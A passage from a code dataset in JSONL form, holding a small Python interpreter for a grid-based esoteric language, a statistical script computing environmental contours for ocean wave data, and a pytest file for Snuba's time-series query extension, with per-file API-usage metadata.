"call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 128, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 227, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 296, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 298, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 299, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 300, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 301, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 302, "usage_type": "call"}]} +{"seq_id": "308003631", "text": "from codeModule import *\nimport colorama, time, os, sys\nfrom colorama import Fore, Back, Style\n\nclass Stack:\n def __init__(self):\n self.stack = []\n\n def __str__(self):\n t = self.stack[::-1]\n out = \"___\"\n for i in t:\n out = \"{}\\n {} \".format(out, i)\n out = out + \"\\n\" + \"___\"\n return out\n\n def pop(self):\n if self.stack:\n return self.stack.pop()\n else:\n return 0\n\n def push(self, val):\n self.stack.append(val)\n\n\ndef cont(v, a, b):\n if v < a:\n return b\n if v > b:\n return a\n return v\n\n\nclass Pointer:\n def __init__(self, diagram):\n self.UP = 0\n self.RIGHT = 1\n self.DOWN = 2\n self.LEFT = 3\n\n self.diagram = diagram\n self.maxX = self.diagram.calcMaxX()\n self.maxY = len(self.diagram.code)\n self.x = 0\n self.y = 0\n self.dir = self.RIGHT\n\n def forward(self):\n if self.dir == self.UP:\n self.y = cont(self.y - 1, 0, self.maxY-1)\n elif self.dir == self.DOWN:\n self.y = cont(self.y + 1, 0, self.maxY-1)\n elif self.dir == self.RIGHT:\n self.x = cont(self.x + 1, 0, self.maxX-1)\n elif self.dir == self.LEFT:\n self.x = cont(self.x - 1, 0, self.maxX-1)\n\n def turnRight(self):\n self.dir = cont(self.dir + 1, self.UP, self.LEFT)\n\n def turnLeft(self):\n self.dir = cont(self.dir - 1, self.UP, self.LEFT)\n\n\nclass Diagram:\n def __init__(self, code=\"\", verbose=False):\n if code:\n self.code = code\n else:\n self.getCode()\n self.stack = Stack()\n self.pointer = Pointer(self)\n self.v = verbose\n if self.v:\n colorama.init()\n\n def getCode(self):\n if len(sys.argv) == 2:\n fName = sys.argv[1]\n else:\n fName = input(\"File Name: \")\n print()\n with open(fName, \"r\") as file:\n data = file.read().split(\"\\n\")\n del data[-1]\n #print(data)\n for i in range(len(data)):\n data[i] = list(data[i])\n #print(data)\n self.code = data\n mx = self.calcMaxX()\n for i in self.code:\n for t in range(mx - len(i)):\n i.append(' ')\n\n def calcMaxX(self):\n lst = list(map(lambda x: len(x), self.code))\n return max(lst)\n\n def run(self):\n while True:\n if self.v:\n if os.name == \"nt\":\n os.system('cls')\n elif os.name == \"posix\":\n os.system('clear')\n for y in range(len(self.code)):\n for x in range(len(self.code[y])):\n #print(\"{}\".format(Style.RESET_ALL), end=\"\")\n style = \"\"\n if x == self.pointer.x and y == self.pointer.y:\n style = Back.RED\n print(\"{}{}\".format(style, self.code[y][x]), end=\"\")\n print(\"{}\".format(Style.RESET_ALL), end=\"\")\n print()\n time.sleep(0.1)\n #print()\n exec(codes[self.code[self.pointer.y][self.pointer.x]])\n self.pointer.forward()\n\n\nif __name__ == \"__main__\":\n d = Diagram(verbose=False)\n d.run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 79, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 105, "usage_type": "call"}, {"api_name": "os.name", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 107, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 113, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 113, "usage_type": "name"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 115, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 115, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "517749613", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 3 13:59:12 2020\n\n@author: astah\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import norm, weibull_min, chi2, lognorm, kstest\nfrom scipy.optimize import curve_fit\nfrom read_write import determine_file_name_e1, write_contour, read_contour\nfrom contour_statistics import points_outside\nfrom plot import PlottedSample, plot_contour\nfrom read_write import read_dataset\nplt.close('all')\n\nplt.close('all')\n#%% Functions to fit\n# Power function\ndef power3(x, a, b, c):\n return a + b * x ** c\n\n# Exponential function\ndef exp3(x, a, b, c):\n return a + b * np.exp(c * x)\n\n#%% Read dataset A, B or C.\nDATASET_CHAR = 'A'\nfile_path = '../datasets/' + DATASET_CHAR + '.txt'\nsample_hs, sample_tz, label_hs, label_tz= read_dataset(file_path)\n\ndf = pd.read_csv(file_path, sep='; ')\n#%% Inspect the marginal distributions\n\nweib_par1 = weibull_min.fit(df[df.columns[1]], loc=0)\nlogn_par1 = lognorm.fit(df[df.columns[1]], loc=0)\n\nweib_par2 = weibull_min.fit(df[df.columns[2]], loc=0)\nlogn_par2 = lognorm.fit(df[df.columns[2]], loc=0)\n\n#%% Goodness of fit\n\nprint(kstest(df[df.columns[1]].values, 'weibull_min', args=weib_par1)) \nprint(kstest(df[df.columns[1]].values, 'lognorm', args=logn_par1))\n\nprint(kstest(df[df.columns[2]].values, 'weibull_min', args=weib_par2))\nprint(kstest(df[df.columns[2]].values, 'lognorm', args=logn_par2))\n\n#%% Plot the distributions\n#n_bins = 100\n\n#plt.figure()\n#plt.subplot(211)\n#n1, bins1, _ = plt.hist(df[df.columns[1]], n_bins, density=True, label = df.columns[1])\n#plt.plot(bins1, weibull_min.pdf(bins1,*weib_par1), label='Weibull')\n#plt.plot(bins1, lognorm.pdf(bins1,*logn_par1), label='Lognorm')\n#plt.legend(loc='best')\n#plt.subplot(212)\n#n, bins, _ = plt.hist(df[df.columns[2]], n_bins, density=True, label = df.columns[2])\n#plt.plot(bins, weibull_min.pdf(bins,*weib_par2), label='Weibull')\n#plt.plot(bins, lognorm.pdf(bins,*logn_par2), label='Lognorm')\n#plt.legend(loc='best')\n\n#%% Bin the data to find the conditoinal marginal distribution\ns_min = df[df.columns[1]].min()\ns_max = df[df.columns[1]].max()\n\nbin_size = 0.5\ns_bins = np.arange(np.floor(s_min), np.ceil(s_max), bin_size) + bin_size/2\ns_binedges = s_bins + bin_size/2\n\ns_ind_bin = np.digitize(df[df.columns[1]], bins=s_binedges)\n\nunique, counts = np.unique(s_ind_bin, return_counts=True)\n\nind_min_bin = unique[counts>10][0]\nind_max_bin = unique[counts>10][-1]\nx_bins = s_bins[ind_min_bin:ind_max_bin+1]\nreal_bins = np.zeros(len(x_bins))\n\nlogn_par_cond = np.zeros((len(x_bins),3))\nmu_cond = np.zeros(len(x_bins))\nsig_cond = np.zeros(len(x_bins))\n\nplot_bins = np.arange(0,14,0.2)\n\nfor i in range(len(x_bins)):\n mask1 = s_ind_bin == i + ind_min_bin\n real_bins[i] = df[df.columns[1]][mask1].mean()\n logn_par_cond[i,:] = lognorm.fit(df[df.columns[2]][mask1], floc=0)\n mu_cond[i] = np.mean(np.log(df[df.columns[2]][mask1]))\n sig_cond[i] = np.std(np.log(df[df.columns[2]][mask1]))\n# plt.figure()\n# b = plt.hist(df[df.columns[2]][mask1], bins= plot_bins, density=True)\n# plt.plot(b[1], lognorm.pdf(b[1],*logn_par_cond[i,:]), color='g')\n\n#bounds = ([0, 0, -np.inf], [np.inf, np.inf, np.inf])\nbounds = ([-1, 0, -np.inf], [np.inf, np.inf, np.inf])\np0_mu = [0, 2, 0.1]\np0_sig = [0.1, 0.1, -0.3]\n\nmu_vars = curve_fit(power3, real_bins, mu_cond, p0=p0_mu, bounds=bounds)[0]\nsig_vars = curve_fit(exp3, real_bins, sig_cond, p0=p0_sig, bounds=bounds)[0]\n\nsig_func = curve_fit(exp3, real_bins, logn_par_cond[:,0], p0=p0_sig, bounds=bounds)[0]\nmu_func = curve_fit(power3, real_bins, np.log(logn_par_cond[:,2]), p0=p0_mu, bounds=bounds)[0]\n\nplt.figure()\nplt.subplot(211)\nplt.plot(real_bins, np.log(logn_par_cond[:,2]), 'o')\nplt.plot(real_bins, mu_cond, 'o')\nplt.plot(x_bins, power3(x_bins, *mu_func))\nplt.ylabel(r'$\\mu$: scale parameter')\nplt.subplot(212)\nplt.plot(real_bins, logn_par_cond[:,0], 'o')\nplt.plot(real_bins, sig_cond, 'o')\nplt.plot(x_bins, exp3(x_bins, *sig_func))\nplt.plot(x_bins, exp3(x_bins, *sig_vars))\nplt.ylabel(r'$\\sigma$: shape parameter')\n\n\n#%% Perform the IDS\n\nT1 = 1\nT20 = 20\n\n#beta1 = norm.ppf(1- 10/(T1*len(df)))\n#beta20 = norm.ppf(1- 10/(T20*len(df)))\nbeta1 = np.sqrt(chi2.ppf(1- 10/(T1*len(df)), df=2))\nbeta20 = np.sqrt(chi2.ppf(1- 10/(T20*len(df)), df=2))\n\nphi = np.linspace(0, 2 * np.pi, 360, endpoint=False)\n\nu0_1 = beta1*np.cos(phi)\nu1_1 = beta1*np.sin(phi)\n\nu0_20 = beta20*np.cos(phi)\nu1_20 = beta20*np.sin(phi)\n\nx1_1 = lognorm.ppf( norm.cdf(u1_1), *logn_par1)\nx1_20 = lognorm.ppf( norm.cdf(u1_20), *logn_par1)\n\n# The weibull conditional distribution\nsig_x1_1 = exp3(x1_1, *sig_func)\nmu_x1_1 = power3(x1_1, *mu_func)\n\nsig_x1_20 = exp3(x1_20, *sig_func)\nmu_x1_20 = power3(x1_20, *mu_func)\n\nx0_1 = lognorm.ppf( norm.cdf(u0_1), sig_x1_1, loc=0, scale=np.exp(mu_x1_1))\nx0_20 = lognorm.ppf( norm.cdf(u0_20), sig_x1_20, loc=0, scale=np.exp(mu_x1_20))\n#%%\nh = sns.jointplot(x= df.columns[2] , y=df.columns[1] , data=df, s=5)\nh.x, h.y = x0_1, x1_1\nh.plot_joint(plt.plot, color='C1')\nh.x, h.y = x0_20, x1_20\nh.plot_joint(plt.plot, color='C2')\n\n#%% E1 requirements:\n# Save the contours as csv files in the required format.\nfolder_name = 'contour_coordinates/'\nfile_name_1 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T1)\nwrite_contour(x1_1, #y-axis\n x0_1,\n folder_name + file_name_1,\n label_x=df.columns[1],\n label_y=df.columns[2])\nfile_name_20 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T20)\nwrite_contour(x1_20,\n x0_20,\n folder_name + file_name_20,\n label_x=df.columns[1],\n label_y=df.columns[2])\n\n# Read the contours from the csv files.\n(contour_hs_1, contour_tz_1) = read_contour(folder_name + file_name_1)\n(contour_hs_20, contour_tz_20) = read_contour(folder_name + file_name_20)\n\n# Find datapoints that exceed the 20-yr contour.\nhs_outside, tz_outside, hs_inside, tz_inside = \\\n points_outside(contour_hs_20,\n contour_tz_20,\n np.asarray(df[df.columns[1]].values),\n np.asarray(df[df.columns[2]].values))\nprint('Number of points outside the contour: ' + str(len(hs_outside)))\n#%%\nnan_mask = np.isnan(contour_tz_20)\n\nfig = plt.figure(figsize=(5, 5), dpi=150)\nax = fig.add_subplot(111)\n\nplotted_sample = PlottedSample(x=np.asarray(sample_tz),\n y=np.asarray(sample_hs),\n ax=ax,\n x_inside=tz_inside,\n y_inside=hs_inside,\n x_outside=tz_outside,\n y_outside=hs_outside,\n return_period=T20)\n# Plot the 1-year contour.\nplot_contour(x=contour_tz_1,\n y=contour_hs_1,\n ax=ax,\n contour_label=str(T1) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b--',\n plotted_sample=plotted_sample)\n\n# Plot the 20-year contour and the sample.\nplot_contour(x=contour_tz_20[~nan_mask],\n y=contour_hs_20[~nan_mask],\n ax=ax,\n contour_label=str(T20) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b-')#,\n# plotted_sample=plotted_sample)\nplt.title('Dataset ' + DATASET_CHAR)\nplt.show()\nplt.savefig('../results/figures/hannesdottir_asta_dataset_'+DATASET_CHAR+'_1_20.png', dpi=300)", "sub_path": "participants-code/contribution-3/e1_baseline_dataset_a_to_c_asta.py", "file_name": "e1_baseline_dataset_a_to_c_asta.py", "file_ext": "py", "file_size_in_byte": 7528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.close", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "read_write.read_dataset", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min", "line_number": 39, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 40, "usage_type": "name"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min", "line_number": 42, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 43, "usage_type": "name"}, {"api_name": "scipy.stats.kstest", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.digitize", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 94, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 109, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 154, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 155, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 155, "usage_type": "call"}, {"api_name": "seaborn.jointplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 166, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 167, "usage_type": "call"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 172, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 173, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 180, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 181, "usage_type": "call"}, {"api_name": "contour_statistics.points_outside", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "plot.PlottedSample", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 197, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 205, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}]} +{"seq_id": "270847276", "text": "from datetime import datetime, timedelta\nfrom typing import Any, MutableMapping, cast\n\nimport pytest\n\nfrom snuba import state\nfrom snuba.clickhouse.columns import ColumnSet\nfrom snuba.datasets.entities import EntityKey\nfrom snuba.query.conditions import (\n BooleanFunctions,\n ConditionFunctions,\n binary_condition,\n)\nfrom snuba.query.data_source.simple import Entity as QueryEntity\nfrom snuba.query.expressions import Column, Expression, Literal\nfrom snuba.query.logical import Query\nfrom snuba.query.timeseries_extension import TimeSeriesExtension\nfrom snuba.request.request_settings import HTTPRequestSettings\nfrom snuba.schemas import validate_jsonschema\n\n\ndef build_time_condition(\n time_columns: str, from_date: datetime, to_date: datetime\n) -> Expression:\n return binary_condition(\n BooleanFunctions.AND,\n binary_condition(\n ConditionFunctions.GTE,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, from_date),\n ),\n binary_condition(\n ConditionFunctions.LT,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, to_date),\n ),\n )\n\n\ntest_data = [\n (\n {\n \"from_date\": \"2019-09-19T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 19, 10), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n \"from_date\": \"1970-01-01T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 18, 12), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n \"from_date\": \"2019-09-19T10:05:30,1234\",\n \"to_date\": \"2019-09-19T12:00:34,4567\",\n },\n build_time_condition(\n \"timestamp\",\n datetime(2019, 9, 19, 10, 5, 30),\n datetime(2019, 9, 19, 12, 0, 34),\n ),\n 60,\n ),\n]\n\n\n@pytest.mark.parametrize(\n \"raw_data, expected_ast_condition, expected_granularity\", test_data,\n)\ndef test_query_extension_processing(\n raw_data: MutableMapping[str, Any],\n expected_ast_condition: Expression,\n expected_granularity: int,\n) -> None:\n state.set_config(\"max_days\", 1)\n extension = TimeSeriesExtension(\n default_granularity=60,\n default_window=timedelta(days=5),\n timestamp_column=\"timestamp\",\n )\n\n valid_data = validate_jsonschema(\n raw_data, cast(MutableMapping[str, Any], extension.get_schema())\n )\n query = Query(QueryEntity(EntityKey.EVENTS, ColumnSet([])))\n\n request_settings = HTTPRequestSettings()\n\n extension.get_processor().process_query(query, valid_data, request_settings)\n assert query.get_condition() == expected_ast_condition\n assert query.get_granularity() == expected_granularity\n", "sub_path": "tests/query/test_timeseries_extension.py", "file_name": "test_timeseries_extension.py", "file_ext": "py", "file_size_in_byte": 2985, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 25, "usage_type": "call"}, {"api_name": "snuba.query.conditions.BooleanFunctions.AND", "line_number": 26, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.BooleanFunctions", "line_number": 26, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 27, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.GTE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 28, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 30, "usage_type": "call"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 32, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.LT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 33, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 35, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 83, "usage_type": "name"}, {"api_name": "snuba.state.set_config", "line_number": 86, "usage_type": "call"}, {"api_name": "snuba.state", "line_number": 86, "usage_type": "name"}, {"api_name": "snuba.query.timeseries_extension.TimeSeriesExtension", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "snuba.schemas.validate_jsonschema", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 94, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 94, "usage_type": "name"}, {"api_name": "snuba.query.logical.Query", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.query.data_source.simple.Entity", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.datasets.entities.EntityKey.EVENTS", "line_number": 96, "usage_type": "attribute"}, {"api_name": "snuba.datasets.entities.EntityKey", "line_number": 96, "usage_type": "name"}, {"api_name": "snuba.clickhouse.columns.ColumnSet", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.request.request_settings.HTTPRequestSettings", "line_number": 98, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": 